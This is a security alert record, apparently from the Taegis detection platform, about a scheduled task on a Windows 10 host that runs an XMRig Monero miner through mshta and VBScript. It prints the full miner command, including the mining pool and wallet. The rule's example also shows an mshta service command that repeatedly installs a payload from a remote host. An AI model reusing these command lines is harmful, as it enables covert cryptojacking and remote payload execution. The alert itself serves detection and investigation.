Persistent Creation of a Windows Scripting Host Automation Object
Is this alert valuable?
Details
Status:
Status Reason:
None
First Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Last Activity:
2024/03/06 12:16:59 UTC (22 days ago)
Inserted At:
2024/03/06 12:29:24 UTC (22 days ago)
First Investigated:
2024/03/06 17:28:42 UTC (22 days ago)
First Resolved:
2024/03/15 18:22:04 UTC (13 days ago)
Severity:
Critical (0.99)
Threat Score:
9.9
Tenant:
Detector:
Taegis Watchlist
Tactics:
Execution, Persistence, Privilege Escalation, Defense Evasion
Sensor Types:
Taegis
Confidence:
100%
Hostname:
Agent/Sensor ID:
Investigations:
2024-03-06 - [CS] Crypto Mining Investigation - PCUS0382
Occurrence Count:
1
Grouped by (Group Key):
96072:app:event-filter:persistence:12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1:432988c18aef458a8a8a95f56a98eba6:[mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)]:2024-02-29
Affected Agents (1)
PCUS0382
Last Updated:
2024/03/28 07:17:16 UTC
OS Distributor:
Microsoft
OS Family:
WINDOWS
OS Version:
Windows 10
Most Recent Address:
172.16.20.11
Open alerts (0) for Related Entities
Open alerts within past 72 hours from alert creationNO DATA
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
0
Hostname (PCUS0382)
0
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
0
Closed alerts (99) for Related Entities
Closed alerts within past 30 days from alert creationAgent/Sensor ID (432988c18aef458a8a8a95f56a98eba6)
26
Hostname (PCUS0382)
72
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1)
1
Open or closed investigations (6) for Related Entities
Open or closed investigations within past 30 daysFile (mshta)
2
Host (432988c18aef458a8a8a95f56a98eba6)
2
Task Name (MSOFFICEER)
2
A persistence event associated with a Windows Scripting Host Automation Object being created was identified. This may indicate that an adversary is attempting to frequently execute malicious content.
Example:
> Service Name: SMMq
> Display Name: SMMq
> Description:
> Type: SERVICE_WIN32_OWN_PROCESS
> Start Type: SERVICE_AUTO_START
> Image Path: mshta.exe vbscript:createobject("wscript.shell").run("Cmd.exe /c for /l %i in (1 1 66) do (Msiexec /i Hxxp://Gk.Vwxqv.Xyz/SMB1.jpg /Q)",0)(window.close)
External References
No external references for this alert.
First Event Details
Persistence
Table
Normalized
Original
SCHEDULED_TASK mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)
Event Time:
2024/03/06 12:16:59 UTC · 22 days ago
Ingest Time:
2024/03/06 12:29:15 UTC · 22 days ago
Category:
SCHEDULED_TASK
Operation:
ADDED
Hostname:
PCUS0382
Sensor ID:
432988c18aef458a8a8a95f56a98eba6
Tenant:
(96072)